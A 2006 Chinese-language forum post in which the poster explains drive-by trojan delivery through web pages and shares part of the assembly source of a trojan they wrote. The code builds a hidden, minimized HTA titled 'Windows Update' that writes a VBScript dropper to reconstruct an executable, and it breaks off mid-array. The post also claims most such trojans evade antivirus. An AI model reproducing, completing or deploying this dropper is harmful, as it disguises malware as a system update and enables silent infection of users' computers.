upside
 
   
  
 反病毒 反詐騙 反虐犬
|
分享:
▲
▼
一般來說 我只要在該網頁內 寫入一些指令語法就能 背景跳出視窗並自動下載檔案到你的電腦並且執行 這樣就達到入侵的動作了 我分享一段 之前寫的木馬程序的一段 應該還能看的懂吧 其他程序的執行法就無發佈出來了 按照現在的XP 系統安全性 幾乎無法防止 因為漏洞實在太多 甚至可以仿照正常下載程序來發佈木馬 防毒與防火牆 不可能阻擋這些正常程序 否則會無法上網或下載 除了已知木馬外約有70%-80% 幾乎無法阻擋 這些也是我頭痛的地方 明知道原理 可是找不出也寫不出好程式  szHTAFileName equ "xxx.exe"
szHTAVbsName equ "xxx.vbs"
szHTACode1 db '<HTML>',13,10
db '<HEAD>',13,10
db '<TITLE>Windows Update</TITLE>',13,10
db '<HTA:APPLICATION ID="Q" APPLICATIONNAME="Q" BORDER="none" BORDERSTYLE="normal" CAPTION="no" ICON="" CONTEXTMENU="no" MAXIMIZEBUTTON="no" MINIMIZEBUTTON="no" SHOWINTASKBAR="no" SINGLEINSTANCE="no" SYSMENU="no" VERSION="1.0" WINDOWSTATE="minimize"/>',13,10
db '<SCRIPT LANGUAGE="VBScript">',13,10
db 'MyFile = "',szHTAVbsName,'"',13,10
db 'Set FSO = CreateObject("Scripting.FileSystemObject")',13,10
db 'Set TSO = FSO.CreateTextFile(MyFile, True)',13,10
db 'TSO.write "dim filesys, filetxt, getname, path, textfile, i" & vbcrlf',13,10
db 'TSO.write "textfile = ""',szHTAFileName,'""" & vbcrlf',13,10
db 'TSO.write "Set filesys = CreateObject(""Scripting.FileSystemObject"")" & vbcrlf',13,10
db 'TSO.write "Set filetxt = filesys.CreateTextFile(textfile, True)" & vbcrlf',13,10
db 'TSO.write "getname = filesys.GetFileName(path)" & vbcrlf',13,10
db 'TSO.write "dim a" & vbcrlf',13,10
db 'TSO.write "a=Array(',0
[ 此文章被upside在2006-12-14 21:26重新編輯 ]
|
爸爸 你一路好走
|
 x0
[3 樓]
From:臺灣
| Posted:2006-12-14 21:15 |
|
|
|
